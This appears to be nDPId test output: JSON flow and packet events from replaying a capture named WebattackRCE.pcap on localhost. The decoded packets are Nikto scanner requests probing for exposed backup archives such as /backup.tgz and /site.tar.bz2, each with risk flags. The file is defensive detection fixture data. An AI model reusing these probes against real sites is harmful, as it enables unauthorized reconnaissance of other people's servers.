-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":341,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277217,"flow_last_seen":1576420277217,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277217,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50226,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":341,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":341,"flow_packet_id":1,"flow_last_seen":1576420277217,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277217,"pkt":"AAAAAAAAAAAAAAAACABFAADHXwtAAEAG3SN\/AAABfwAAAcQyH5CeyGeSqwnqXYAYAED+uwAAAQEICp1m\/QmdZv0JR0VUIC8xMjcwMDEudGFyLmx6bWEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} -01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":341,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277217,"flow_last_seen":1576420277217,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277217,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50226,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":342,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277218,"flow_last_seen":1576420277218,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277218,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50228,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":342,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":342,"flow_packet_id":1,"flow_last_seen":1576420277218,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277218,"pkt":"AAAAAAAAAAAAAAAACABFAADHKPlAAEAGEzZ\/AAABfwAAAcQ0H5BMBRBwjCFtgIAYAED+uwAAAQEICp1m\/QqdZv0KR0VUIC8xMjcwMDEudGFyLmx6bWEgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":342,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277218,"flow_last_seen":1576420277218,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277218,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50228,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":343,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":343,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277219,"flow_last_seen":1576420277219,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277219,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50230,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":343,"flow_packet_id":1,"flow_last_seen":1576420277219,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277219,"pkt":"AAAAAAAAAAAAAAAACABFAADE4jtAAEAGWfZ\/AAABfwAAAcQ2H5DSrNqhX1PVN4AYAED+uAAAAQEICp1m\/QudZv0LR0VUIC9zaXRlLnRhci5iejIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":343,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":343,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277219,"flow_last_seen":1576420277219,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277219,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50230,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":344,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277221,"flow_last_seen":1576420277221,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277221,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50232,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":344,"flow_packet_id":1,"flow_last_seen":1576420277221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277221,"pkt":"AAAAAAAAAAAAAAAACABFAADEaVlAAEAG0th\/AAABfwAAAcQ4H5ChqlHP+pxqwIAYAED+uAAAAQEICp1m\/Q2dZv0NR0VUIC9zaXRlLnRhci5iejIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":344,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277221,"flow_last_seen":1576420277221,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277221,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50232,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":345,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277222,"flow_last_seen":1576420277222,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277222,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50234,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":345,"flow_packet_id":1,"flow_last_seen":1576420277222,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277222,"pkt":"AAAAAAAAAAAAAAAACABFAADCu\/NAAEAGgEB\/AAABfwAAAcQ6H5D46YNpMAqH8IAYAED+tgAAAQEICp1m\/Q6dZv0OR0VUIC9iYWNrdXAudGd6IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":345,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277222,"flow_last_seen":1576420277222,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277222,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50234,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":346,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277224,"flow_last_seen":1576420277224,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277224,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50236,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":346,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":346,"flow_packet_id":1,"flow_last_seen":1576420277224,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277224,"pkt":"AAAAAAAAAAAAAAAACABFAADCyzFAAEAGcQJ\/AAABfwAAAcQ8H5A0R\/O25IFzRIAYAED+tgAAAQEICp1m\/RCdZv0PR0VUIC9iYWNrdXAudGd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":346,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277224,"flow_last_seen":1576420277224,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277224,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50236,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":347,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277225,"flow_last_seen":1576420277225,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277225,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50238,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":347,"flow_packet_id":1,"flow_last_seen":1576420277225,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277225,"pkt":"AAAAAAAAAAAAAAAACABFAAC90OxAAEAGa0x\/AAABfwAAAcQ+H5C1k+hxPtlM+IAYAED+sQAAAQEICp1m\/RGdZv0RR0VUIC8wLmFseiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":347,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277225,"flow_last_seen":1576420277225,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277225,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50238,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":348,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":348,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277228,"flow_last_seen":1576420277228,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277228,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50240,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":348,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":348,"flow_packet_id":1,"flow_last_seen":1576420277228,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277228,"pkt":"AAAAAAAAAAAAAAAACABFAAC9wfFAAEAGekd\/AAABfwAAAcRAH5ChSfl1EHb5\/IAYAED+sQAAAQEICp1m\/RSdZv0UR0VUIC8wLmFseiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":348,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":348,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277228,"flow_last_seen":1576420277228,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277228,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50240,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":349,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277229,"flow_last_seen":1576420277229,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277229,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50242,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":349,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":349,"flow_packet_id":1,"flow_last_seen":1576420277229,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277229,"pkt":"AAAAAAAAAAAAAAAACABFAADB75lAAEAGTJt\/AAABfwAAAcRCH5BYYNcNJ8u6iIAYAED+tQAAAQEICp1m\/RWdZv0VR0VUIC8xMjcwMC5hbHogSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":349,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277229,"flow_last_seen":1576420277229,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277229,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50242,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":350,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":350,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277231,"flow_last_seen":1576420277231,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277231,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50244,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":350,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":350,"flow_packet_id":1,"flow_last_seen":1576420277231,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277231,"pkt":"AAAAAAAAAAAAAAAACABFAADB77xAAEAGTHh\/AAABfwAAAcREH5CTV9cik40gf4AYAED+tQAAAQEICp1m\/RedZv0WR0VUIC8xMjcwMC5hbHogSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":350,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":350,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277231,"flow_last_seen":1576420277231,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277231,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50244,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":351,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":351,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277232,"flow_last_seen":1576420277232,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277232,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50246,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":351,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":351,"flow_packet_id":1,"flow_last_seen":1576420277232,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277232,"pkt":"AAAAAAAAAAAAAAAACABFAADB9\/xAAEAGRDh\/AAABfwAAAcRGH5CWhs9n6ph7xIAYAED+tQAAAQEICp1m\/RidZv0YR0VUIC8xMjcuMC50YXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":351,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":351,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277232,"flow_last_seen":1576420277232,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277232,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50246,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 